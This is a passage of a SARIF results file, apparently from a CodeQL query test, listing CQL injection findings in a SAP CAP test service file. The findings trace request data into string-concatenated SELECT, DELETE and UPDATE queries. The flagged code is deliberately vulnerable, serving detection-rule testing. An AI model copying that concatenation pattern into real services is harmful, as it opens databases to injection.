id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":227,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":227,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":229,"startColumn":7,"endColumn":59}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":13,"endColumn":59}}}],"partialFingerprints":{"primaryLocationLineHash":"28ec6e53085bb293:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":233,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":233,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":233,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":56,"endColumn":58}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":47,"endColumn":58}},"message":{"text":"`ID =` + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":13,"endColumn":59}},"message":{"text":"DELETE. ... ` + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":7,"endColumn":59}},"message":{"text":"await D ... ` + id)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":233,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":233,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":235,"startColumn":7,"endColumn":59}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":13,"endColumn":60}}}],"partialFingerprints":{"primaryLocationLineHash":"a76513a6cb8f584d:1","primaryLocationStartColumnFingerprint":"6"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":239,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":239,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":239,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":55,"endColumn":57}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":47,"endColumn":59}},"message":{"text":"`ID = ${id}`"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":13,"endColumn":60}},"message":{"text":"DELETE. ... ${id}`)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":7,"endColumn":60}},"message":{"text":"await D ... ${id}`)"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":239,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":239,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":241,"startColumn":7,"endColumn":60}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":254,"startColumn":16,"endColumn":21}}}],"partialFingerprints":{"primaryLocationLineHash":"e396e28dff49f821:1","primaryLocationStartColumnFingerprint":"9"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":252,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":252,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":252,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":253,"startColumn":63,"endColumn":65}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":253,"startColumn":55,"endColumn":65}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":253,"startColumn":21,"endColumn":66}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":253,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":254,"startColumn":16,"endColumn":21}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":252,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":252,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":259,"startColumn":7,"endColumn":53}}}],"partialFingerprints":{"primaryLocationLineHash":"4710d78c10aa291b:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":258,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":258,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":258,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":259,"startColumn":50,"endColumn":52}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":259,"startColumn":41,"endColumn":52}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":258,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":258,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":259,"startColumn":41,"endColumn":52}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":7,"endColumn":86}}}],"partialFingerprints":{"primaryLocationLineHash":"6f850daa3f58c276:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":57,"endColumn":63}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":41,"endColumn":63}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":83,"endColumn":85}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":71,"endColumn":85}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":268,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":41,"endColumn":63}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":269,"startColumn":71,"endColumn":85}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":284,"startColumn":7,"endColumn":55}}}],"partialFingerprints":{"primaryLocationLineHash":"b9f8b15603ad6b38:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":283,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":283,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":283,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":284,"startColumn":52,"endColumn":54}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":284,"startColumn":43,"endColumn":54}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":283,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":283,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":284,"startColumn":43,"endColumn":54}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":292,"startColumn":20,"endColumn":25}}}],"partialFingerprints":{"primaryLocationLineHash":"d576c66caddc969a:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":289,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":289,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":289,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":291,"startColumn":63,"endColumn":65}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":291,"startColumn":55,"endColumn":65}},"message":{"text":"\"ID=\" + id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":291,"startColumn":21,"endColumn":66}},"message":{"text":"SELECT. ... \" + id)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":291,"startColumn":13,"endColumn":18}},"message":{"text":"query"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":292,"startColumn":20,"endColumn":25}},"message":{"text":"query"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":289,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":289,"startColumn":22,"endColumn":30}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":298,"startColumn":7,"endColumn":57}}}],"partialFingerprints":{"primaryLocationLineHash":"3b0cd005704d307:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":296,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":296,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":296,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":298,"startColumn":54,"endColumn":56}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":298,"startColumn":45,"endColumn":56}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":296,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":296,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":298,"startColumn":45,"endColumn":56}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":7,"endColumn":90}}}],"partialFingerprints":{"primaryLocationLineHash":"a2422d95f31b0028:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":61,"endColumn":67}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":45,"endColumn":67}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":87,"endColumn":89}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":75,"endColumn":89}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":308,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":45,"endColumn":67}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":310,"startColumn":75,"endColumn":89}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided 